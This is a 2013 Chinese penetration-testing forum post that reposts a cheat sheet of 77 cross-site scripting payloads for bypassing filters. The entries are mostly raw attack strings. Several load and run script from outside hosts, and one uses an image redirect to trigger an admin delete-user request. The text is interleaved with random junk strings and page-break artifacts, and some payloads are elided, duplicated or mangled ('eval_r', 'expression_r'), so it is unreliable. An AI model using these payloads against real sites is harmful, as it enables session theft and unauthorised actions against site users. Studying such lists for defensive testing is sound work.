中国网络渗透测试联盟
标题:
XSS攻击汇总
[打印本页]
作者:
admin
时间:
2013-4-19 19:22
标题:
XSS攻击汇总
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
6 _3 U" p* b" O, t
(1)普通的XSS JavaScript注入
' y& w, s `8 j, Y7 Z( Q' z3 z7 E; Q
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
2 h2 y$ d* N0 V$ J
(2)IMG标签XSS使用JavaScript命令
2 D/ K- n1 e0 a& m' ?/ B' H) o8 T
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
$ E6 j8 t- W$ p: \
(3)IMG标签无分号无引号
. J5 Y- e5 k- _* ]
<IMG SRC=javascript:alert(‘XSS’)>
3 M: c% S g5 C( U
(4)IMG标签大小写不敏感
9 S1 b( L6 r& S# M5 t( f
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
1 l9 S7 p$ I. e" A- |' c, ~
(5)HTML编码(必须有分号)
1 h- k( `' g# W; e8 ^ C; ?) e
<IMG SRC=javascript:alert(“XSS”)>
" R& U! A) [8 {1 _! s- v7 N
(6)修正缺陷IMG标签
# g M4 J0 C1 R$ ?" |' X3 U& z* y U
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
8 K3 P2 c" B, u& ~. A; {" H) L
; |8 k* W5 M$ A/ ~4 b: A
$ g c1 z: u& M: y, |' L
(7)formCharCode标签(计算器)
1 C7 r1 a( t& d
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
1 h! X; ^2 `# N! \4 R! b
(8)UTF-8的Unicode编码(计算器)
4 {( o: ~$ ]. d8 I" t% _8 n" {
<IMG SRC=jav..省略..S')>
+ u% _% V% o/ d r; k0 k e
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
3 d( T# W* D9 N& M0 j* f% [
<IMG SRC=jav..省略..S')>
4 t7 p- P- F- S9 B
(10)十六进制编码也是没有分号(计算器)
7 g3 L$ o7 S- B* G/ B E4 }) B
<IMG SRC=java..省略..XSS')>
* ]' J0 m( h8 T. d1 w* m
(11)嵌入式标签,将Javascript分开
$ }+ W2 C; H2 Z8 _
<IMG SRC=”jav ascript:alert(‘XSS’);”>
/ b) I* m0 R( d, `5 w4 c
(12)嵌入式编码标签,将Javascript分开
( U+ e; a$ q8 [5 d; |; N4 X
<IMG SRC=”jav ascript:alert(‘XSS’);”>
0 i5 \: @* a" g( a9 l0 P& Z" y
(13)嵌入式换行符
: P) w2 x$ C; f
<IMG SRC=”jav ascript:alert(‘XSS’);”>
! w+ Y1 Z; u9 [+ e/ _3 T
(14)嵌入式回车
5 q: L! d. t' }" M& i
<IMG SRC=”jav ascript:alert(‘XSS’);”>
8 m0 e. k( S5 | c
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
5 n# |0 i0 d; N
<IMG SRC=”javascript:alert(‘XSS‘)”>
. f3 z5 ^: G, W5 X. @
(16)解决限制字符(要求同页面)
7 X% W, ~# h" n% y4 i0 _
<script>z=’document.’</script>
9 z# M! H. F% I( R
<script>z=z+’write(“‘</script>
, ]- Z7 }- L8 w: Y5 @* V! C
<script>z=z+’<script’</script>
- S( B& x" _7 O$ [. b
<script>z=z+’ src=ht’</script>
& v3 A5 S% h" O
<script>z=z+’tp://ww’</script>
2 O! }0 l: L8 t" J" U% s' r
<script>z=z+’w.shell’</script>
* X4 U* J2 z2 r) |# q; u
<script>z=z+’.net/1.’</script>
: A( L1 I" b' b7 o" ?. {
<script>z=z+’js></sc’</script>
8 t. U7 ?1 p5 R: Q, {- L1 w7 b: j
<script>z=z+’ript>”)’</script>
7 g- j3 G3 \8 {) x Q
<script>eval_r(z)</script>
# |+ o- W/ Y! E6 U# {
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
3 Q, u( \3 w7 I
https://www.t00ls.net/viewthread ... table&tid=15267
2/6
2 e2 y2 \5 T Z
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
" |& N4 y: j. i5 @
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
6 K4 H7 ?. f9 ]/ {2 c
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
6 u4 w2 x# `( M5 Z$ Z U8 A
(19)Spaces和meta前的IMG标签
* `3 ~0 `4 E' p3 k# k
<IMG SRC=” javascript:alert(‘XSS’);”>
8 g- O" q* a9 e' e" v! ^
(20)Non-alpha-non-digit XSS
# \. \- l/ x6 z* H) A/ k7 W+ M' f
<SCRIPT/XSS SRC=”
http://3w.org/XSS/xss.js
”></SCRIPT>
, A5 s0 V, k% ]* I# Y
(21)Non-alpha-non-digit XSS to 2
C1 |+ d5 Q* d7 U# n6 f3 N
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
. z# {' x8 M: a
(22)Non-alpha-non-digit XSS to 3
, ]; G) x4 N; V$ b: y6 W0 o
<SCRIPT/SRC=”
http://3w.org/XSS/xss.js
”></SCRIPT>
' K: R- n7 A, ?; E
(23)双开括号
" }% k) a6 \& v; G& L$ S q8 f, h
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
& k& j: F4 h( E
(24)无结束脚本标记(仅火狐等浏览器)
& |6 R4 O ?- r3 V
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
: w @( a5 n. c0 {$ K
(25)无结束脚本标记2
, P2 J: N( i) b) Y* }
<SCRIPT SRC=//3w.org/XSS/xss.js>
: C$ U- e; e4 x K0 Q
(26)半开的HTML/JavaScript XSS
3 j: ~, a P/ n8 x) d
<IMG SRC=”javascript:alert(‘XSS’)”
& }3 e0 R A/ o
(27)双开角括号
( f' X C2 [1 S$ [2 P- Q
<iframe src=http://3w.org/XSS.html <
- N' W* H' L7 N N. [- D
(28)无单引号 双引号 分号
7 Z5 k( G7 T! n; U. Z9 a& o
<SCRIPT>a=/XSS/
# l! F8 x8 x- j" J$ W! F
alert(a.source)</SCRIPT>
" H3 M, A* f* o3 W
(29)换码过滤的JavaScript
' D; Y; _) N' r X9 B; f+ `% j% v$ b
\”;alert(‘XSS’);//
$ E* ~& C: r! u
(30)结束Title标签
# a$ o0 F4 S, L: E8 v& s) A
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
! I3 w; X& ]7 J' F! K' z
(31)Input Image
, k9 L' r8 R& r( N; r2 \% G
<INPUT SRC=”javascript:alert(‘XSS’);”>
- }2 q7 J+ u8 p5 _1 `
(32)BODY Image
, q# t! G( R+ z- p9 G4 B" q P
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
- Y" `( H* ~$ R
(33)BODY标签
( L/ u" M3 K$ m$ K+ @" K
<BODY(‘XSS’)>
2 l! c0 ?5 _2 p: i6 o3 W
(34)IMG Dynsrc
( A( r% S( q2 i$ ]1 S0 f
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
! d9 O+ R1 k# `, } P7 M+ o. m
(35)IMG Lowsrc
; o) f, Q' @8 P6 X% `' A
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
. ?( M6 G" E- D+ t1 c p
(36)BGSOUND
+ p. Q1 |" q. P. H- ^
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
$ O3 u% q/ T! K. O7 Y1 o: B, P3 a
(37)STYLE sheet
8 G1 o, b* ?. b7 S) B' l# M
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
- |- k8 s9 B( A! X" W- U5 n4 A
(38)远程样式表
& F- n" d6 J" X' ]
<LINK REL=”stylesheet” HREF=”
http://3w.org/xss.css
”>
: }0 x- E0 n# `* r8 b/ f+ N
(39)List-style-image(列表式)
( d7 @( G, ~) u+ V
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
, i) C# N+ ^4 U4 p0 ~8 I
(40)IMG VBscript
: W( Q. `7 [- O) }2 H+ a
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
: x/ ]& P) M- e9 |. K. m3 H/ A
(41)META链接url
" j7 Q( m. a* o$ Z% ?
$ M6 F6 {$ A, [, P
' ~3 q6 u* k% g4 N5 ]* M
<META HTTP-EQUIV=”refresh” CONTENT=”0;
/ H, ]% Z5 i& Z# }; G' l+ q! x
URL=http://;URL=javascript:alert(‘XSS’);”>
3 `6 o2 Z2 o, m( b- M, V# n
(42)Iframe
$ Q0 M5 }+ u$ G
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>
2 W/ G4 t+ a5 [3 A% T. C
(43)Frame
; G5 v5 d0 _9 @& o- e+ A- W" @: c
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
1 F- A( B, a' E; P5 n6 u
https://www.t00ls.net/viewthread ... table&tid=15267
3/6
' y/ G$ {) q" _2 R3 n0 A
(44)Table
1 U8 E8 F. ?9 A3 A+ J1 U8 S
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
& A& z. I7 ^0 P; X7 M
(45)TD
0 Z) ?% u+ b6 ?8 Y; w6 c
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
9 c* Q) K5 M1 c0 Y
(46)DIV background-image
9 T5 v9 u" `5 @- f3 w: h/ o e7 y
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
/ E4 h3 @- p" m: I- p4 A
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
3 O" v1 N( g' z3 f: |
8&13&12288&65279)
! ^% q1 l) ?1 x5 c
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
- X7 a$ c) A$ P9 B6 c* l$ ~7 _; n
(48)DIV expression
% w# R9 \8 ` Z, y B' _8 }/ |) \
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
" S1 ?8 w0 K/ k$ Z- V, C
(49)STYLE属性分拆表达
' O0 y6 q k2 H6 T9 Z3 Y6 u
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
$ W; o3 _0 D+ S$ l
(50)匿名STYLE(组成:开角号和一个字母开头)
8 e+ `7 N- c: ~+ z+ x! [, @+ E, r
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
$ Q. Y, ^4 t0 e% P( d- K6 ?. |
(51)STYLE background-image
/ T( g# ?: ] j! v$ G
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
# s6 q0 w9 D J( i. `/ m/ F( @
CLASS=XSS></A>
+ _% K- j9 l4 J( P. J( T! S9 J) P$ I1 e! K
(52)IMG STYLE方式
w/ m9 C. q! x6 F2 q
exppression(alert(“XSS”))’>
4 Z% m0 O0 w" g3 b0 m
(53)STYLE background
2 ?( z, U: k4 h6 `. `
<STYLE><STYLE
9 K' G& \4 J' M6 P3 T. G
type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
: ^) F H8 ~# j8 M5 C5 v
(54)BASE
! B* x5 Z" _3 O4 b$ n8 e; u, E
<BASE HREF=”javascript:alert(‘XSS’);//”>
0 z' G7 y0 `' X a5 x1 G; s1 _
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
* ~9 C6 y& q6 y1 M- ?
<EMBED SRC=”
http://3w.org/XSS/xss.swf
” ></EMBED>
/ H5 i. |7 O* `/ h+ w3 U: T
(56)在flash中使用ActionScrpt可以混进你XSS的代码
0 \* e4 r0 l) i
a=”get”;
3 y& z* [% ^' R5 W1 H
b=”URL(\”";
/ u" ^/ }! x3 s0 ]6 c2 [
c=”javascript:”;
- _% t4 G0 q3 P. R5 q
d=”alert(‘XSS’);\”)”;
0 {& `* q) [3 T6 Q g7 ?, ^$ Z+ }
eval_r(a+b+c+d);
& e# L# N' e+ b0 K
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
" i2 m& w& |" i
<HTML xmlns:xss>
/ Y- O6 @1 b i" }' Y2 Y! }
<?import namespace=”xss” implementation=”
http://3w.org/XSS/xss.htc
”>
/ E4 @8 f' {1 a$ s8 W
<xss:xss>XSS</xss:xss>
! H. q: {* l* h& F9 K
</HTML>
- G" K) F* A2 }4 a3 L# B2 d1 ] |
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
; C. N9 O+ P! D
<SCRIPT SRC=””></SCRIPT>
. y, B6 ^" l) u- b4 Q' [" D
(59)IMG嵌入式命令,可执行任意命令
9 @$ k) s# D1 g! v0 \: {' p
<IMG SRC=”
http://www.XXX.com/a.php?a=b
”>
) P$ E8 c9 D& M. V9 g% e* Q( D: O0 s
(60)IMG嵌入式命令(a.jpg在同服务器)
& e, P, j0 N0 e; i1 D; b
Redirect 302 /a.jpg
http://www.XXX.com/admin.asp&deleteuser
% a; G2 y4 @% b; f b
(61)绕符号过滤
* `) k! u4 ^- w$ O
<SCRIPT a=”>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
, d6 b* s$ {- w
(62)
1 w5 m0 R/ D5 I* |8 Y4 |: a
<SCRIPT =”>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
. n3 p3 W. P x( E+ z
(63)
, C. m4 }9 T1 i6 m! n- b
<SCRIPT a=”>” ” SRC=”
http://3w.org/xss.js
”></SCRIPT>
% u' d# G: j {$ v" P6 W4 \3 m3 q/ [- i1 }
(64)
5 B; ?- O! Q8 q6 C, Q* L& K4 Y5 c
<SCRIPT “a=’>’” SRC=”
http://3w.org/xss.js
”></SCRIPT>
6 h4 P. `; d) t; J+ ?2 p+ N: o
(65)
8 P7 n! p I9 t& y
<SCRIPT a=`>` SRC=”
http://3w.org/xss.js
”></SCRIPT>
) w) @# {+ e! q+ K7 L7 C# b
(66)12-7-1 T00LS - Powered by Discuz! Board
* d+ L# y& b2 g4 f7 Y0 Z
https://www.t00ls.net/viewthread ... table&tid=15267
4/6
+ Q% }9 }; _% u7 T1 X
<SCRIPT a=”>’>” SRC=”
http://3w.org/xss.js
”></SCRIPT>
$ {2 J+ U5 P, H+ b/ ]9 S( E2 T- l
(67)
, q$ S% q% ~6 n
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”
http://3w.org/xss.js
”>
/ F+ Q) E& A% }6 n
</SCRIPT>
7 A5 s/ [; \8 ~" C: t0 P+ u
(68)URL绕行
9 J7 C6 ~! o1 D9 {$ y
<A HREF=”
http://127.0.0.1/
”>XSS</A>
# H5 S% u+ M0 c. c. o
(69)URL编码
( f: U# \4 L, r0 D3 j2 ?
<A HREF=”
http://3w.org
”>XSS</A>
- s+ J; F. }% T5 h) B6 Z
(70)IP十进制
$ S4 a+ K$ p. T. O; ~6 b( s
<A HREF=”http://3232235521″>XSS</A>
& r4 e Y! ~6 E3 G8 |
(71)IP十六进制
. k- z: c/ ?7 w2 |5 [& Q# ]2 G n
<A HREF=”
http://0xc0.0xa8.0
×00.0×01″>XSS</A>
6 h& x$ H( M7 }% B+ D" h
(72)IP八进制
3 h, p: ?0 t1 B
<A HREF=”
http://0300.0250.0000.0001
″>XSS</A>
- _8 ^% I! j, r" C, X
(73)混合编码
. d9 {4 K( ?5 `1 k t1 c' p- a
<A HREF=”h
, Z& {2 V) o2 M9 P2 l5 m8 p
tt p://6 6.000146.0×7.147/”">XSS</A>
4 D. C* c6 D4 A& W, `( x& U
(74)节省[http:]
' ?" E3 Q" I2 p2 B1 C- J3 m
<A HREF=”//www.google.com/”>XSS</A>
* r, w* M1 e2 D, r. j& M$ g+ T0 a
(75)节省[www]
A9 D( E/ m" h B
<A HREF=”
http://google.com/
”>XSS</A>
1 }6 t1 }+ s9 U, k' D* D$ |; e
(76)绝对点绝对DNS
" p" ?2 G5 }$ ^% s f4 C t
<A HREF=”
http://www.google.com./
”>XSS</A>
* V% m3 M4 \8 V. q4 Y% ?( O
(77)javascript链接
3 H7 C7 T/ n% l0 u
<A HREF=”javascript:document.location=’
http://www.google.com/
’”>XSS</A>
8 T$ n2 b" r& r! b k
0 X, b# p j/ A1 k0 f/ G% |
原文地址:
http://fuzzexp.org/u/0day/?p=14
: L9 S! v, F$ G5 X7 `
) a9 ~6 T$ @2 f% E! H
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2